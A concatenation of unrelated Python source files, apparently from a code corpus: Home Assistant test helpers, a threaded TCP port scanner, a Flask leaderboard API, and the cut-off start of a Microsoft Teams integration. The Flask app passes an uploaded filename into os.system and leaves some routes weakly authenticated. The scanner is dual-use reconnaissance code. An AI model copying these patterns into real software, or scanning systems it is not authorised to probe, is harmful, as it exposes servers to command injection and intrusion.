EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
registry._rebuild_index()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
"""Initialize the recorder asynchronously."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://"
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert await async_setup_component(
hass, recorder.DOMAIN, {recorder.DOMAIN: config}
)
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
app_thread.py | # Local/Own Server Port Scanner
# Thread but quick
import threading
import socket
import sys
from queue import Queue # first in first out
import os
from pathlib import Path
import json
os.chdir(Path(__file__).parent )
with open("./portscanner.json", mode="r", encoding="UTF-8") as file:
content = file.read()
app_json = json.loads(content)
target_ip = app_json["target_ip"]
port_start = app_json["port_start"]
port_end = app_json["port_end"]
num_threads = 10
thread_list = []
open_ports = []
queue = Queue()
def scan_port(port):
net_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP
result = net_socket.connect_ex((target_ip, port))
if result == 0:
return True
else:
return False
def worker():
while not queue.empty():
port = queue.get()
if scan_port(port):
# print(f"Port {port} is open")
open_ports.append(port)
def fill_queue(port_list):
for port in port_list:
queue.put(port)
if __name__ == "__main__":
# Create a list of Ports
port_list = range(port_start, port_end)
# Fill the Queue with port list, to avoid scanning the same port via threads
fill_queue(port_list)
# Create and start the threads
for t in range(num_threads):
thread = threading.Thread(target=worker)
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
print("Open Ports are:", open_ports)
|
start_n.py | import threading
from client.agent import Agent
from time import sleep
if __name__ == '__main__':
N = 12
for i in range(N):
a = Agent(figure='queen')
thread = threading.Thread(target=a.run)
thread.start()
sleep(0.3)
|
app.py | from flask import Flask, jsonify, request, redirect, Response, send_file
from database import SessionLocal, engine
from getData import *
from database import *
from getDB import *
import models
from security import *
from werkzeug.utils import secure_filename
from flask_cors import CORS, cross_origin
import csv
import threading
app = Flask(__name__)
db = SessionLocal()
models.Base.metadata.create_all(bind=engine)
def readCSVFile(filename):
print("here")
os.system("python fillDB.py " + filename + " &")
@app.route('/')
@cross_origin()
def index():
response = jsonify(getJsonFromDB())
return response
@app.route('/add', methods=['POST'])
def add():
# get header
header = request.headers.get('Authorization')
if header is None:
return jsonify({"error": "No authorization header"}), 401
# pass token to verify
if verify_token(header) == None:
return jsonify({"error": "Invalid token"}), 401
# get data from the name email and qwiklabs from the request
#print(request.json)
name = request.json['name']
email = request.json['email']
qwiklabs = request.json['qwikLabURL']
profile_image = profileImage(qwiklabs)
score = getScoreRefresh(qwiklabs)
user = models.Leaderboard(name=name, email=email, qwiklab_url=qwiklabs, total_score=score["total_score"], track1_score=score["track1_score"], track2_score=score["track2_score"], profile_image=profile_image)
try:
db.add(user)
db.commit()
# refresh the db
return jsonify({"success": "success"})
except:
return jsonify({"error": "Already exists"})
# upload csv file and put data in the database
@app.route('/upload', methods=['POST'])
def upload():
# get header
header = request.headers.get('Authorization')
if header is None:
return jsonify({"error": "No authorization header"}), 401
# pass token to verify
if verify_token(header) == None:
return jsonify({"error": "Invalid token"}), 401
# get name email and qwiklabs from the file uploaded
file = request.files['file']
# saving the file
filename = "/app/database/" + secure_filename(file.filename) + "code"
file.save(filename)
with open(filename, 'r') as csvfile:
# read the file
reader = csv.DictReader(csvfile)
for row in reader:
try:
name = row['Student Name']
email = row['Student Email']
qwiklabs = row['Qwiklabs Profile URL']
# call the function in a different thread
thread = threading.Thread(target=readCSVFile, args=(filename,))
thread.start()
return jsonify({"success": "success"})
except:
return jsonify({"error": "Invalid csv file"})
@app.route('/register', methods=['POST'])
def register():
# get data from the name email and qwiklabs from the request
#print(request.json)
username = request.json['username']
password = request.json['password']
user = models.UserModel(username=username, password=hashMe(password))
try:
db.add(user)
db.commit()
return jsonify({"success": "success"})
except:
return jsonify({"error": "Already exists"})
@app.route('/login', methods=['POST'])
def login():
username = request.json['username']
password = request.json['password']
user = db.query(models.UserModel).filter_by(username=username).first()
if not user:
return jsonify({"message": "user does not exist"})
if not verify_passwd(password, user.password):
# return status code 401 and send message
return jsonify({"message": "Invalid credentials"})
access_token = create_access_token(user.username)
return jsonify({"access_token": access_token, "type": "bearer"})
@app.route('/update', methods=['POST'])
def update():
email = request.json['email']
# find email in database
user = db.query(models.Leaderboard).filter_by(email=email).first()
score = getScoreRefresh(user.qwiklab_url)
user.total_score = score["total_score"]
user.track1_score = score["track1_score"]
user.track2_score = score["track2_score"]
db.commit()
return jsonify({"success": "success"})
@app.route('/image')
def image():
# return default.png
return send_file('default.png', mimetype='image/png')
@app.route('/logs')
def sendScrappingErrorLog():
# get header
header = request.headers.get('Authorization')
if header is None:
return jsonify({"error": "No authorization header"})
# pass token to verify
if verify_token(header) == None:
return jsonify({"error": "Invalid Token"})
return send_file('database/scraping_log.txt', 'text/plain')
@app.route("/getScore")
def giveScore():
url = request.json["url"]
#user = db.query(models.Leaderboard).filter_by(qwiklab_url=url).first()
return jsonify(getScoreRefresh(url))
@app.route("/app")
def getApp():
# write in a text file the number
# of times the app is accessed
#check if file exists
if os.path.isfile("database/app.txt"):
# if file exists, open it and read the number
with open("database/app.txt", "r") as file:
number = file.read()
# increment the number
number = int(number) + 1
# write the number in the file
with open("database/app.txt", "w") as file:
file.write(str(number))
else:
# if file does not exist, create it and write the number
with open("database/app.txt", "w") as file:
file.write("1")
return send_file("leaderboardv2.apk", "application/vnd.android.package-archive")
@app.route("/app/number")
def getAppNumber():
# check if file exists
if os.path.isfile("database/app.txt"):
# if file exists, open it and read the number
with open("database/app.txt", "r") as file:
number = file.read()
# return the number
return jsonify({"number": number})
else:
# if file does not exist, return 0
return jsonify({"number": 0})
@app.route("/app/activate")
def activateApp():
if os.path.isfile("database/app_active.txt"):
# if file exists, open it and read the number
with open("database/app_active.txt", "r") as file:
number = file.read()
# increment the number
number = int(number) + 1
# write the number in the file
with open("database/app_active.txt", "w") as file:
file.write(str(number))
else:
# if file does not exist, create it and write the number
with open("database/app_active.txt", "w") as file:
file.write("1")
return jsonify({"message": "activated"})
@app.route("/app/active")
def getActiveApp():
if os.path.isfile("database/app_active.txt"):
with open("database/app_active.txt", "r") as file:
number = file.read()
return jsonify({"number": number.strip()})
else:
return jsonify({"number": 0})
@app.route("/updateURL")
def updateURL():
# Security
header = request.headers.get('Authorization')
if header is None:
return jsonify({"error": "No authorization header"})
# pass token to verify
if verify_token(header) == None:
return jsonify({"error": "Invalid Token"})
url = request.json["url"]
email = request.json["email"]
user = db.query(models.Leaderboard).filter_by(email=email).first()
user.qwiklab_url = url
db.commit()
return jsonify({"success": "success"})
if __name__== "__main__":
app.run(
host='0.0.0.0', port="443",
ssl_context=('origin.pem', 'key.pem'), # comment this line to not run the server in https
)
|
MicrosoftTeams.py | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Unknown': 0,
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
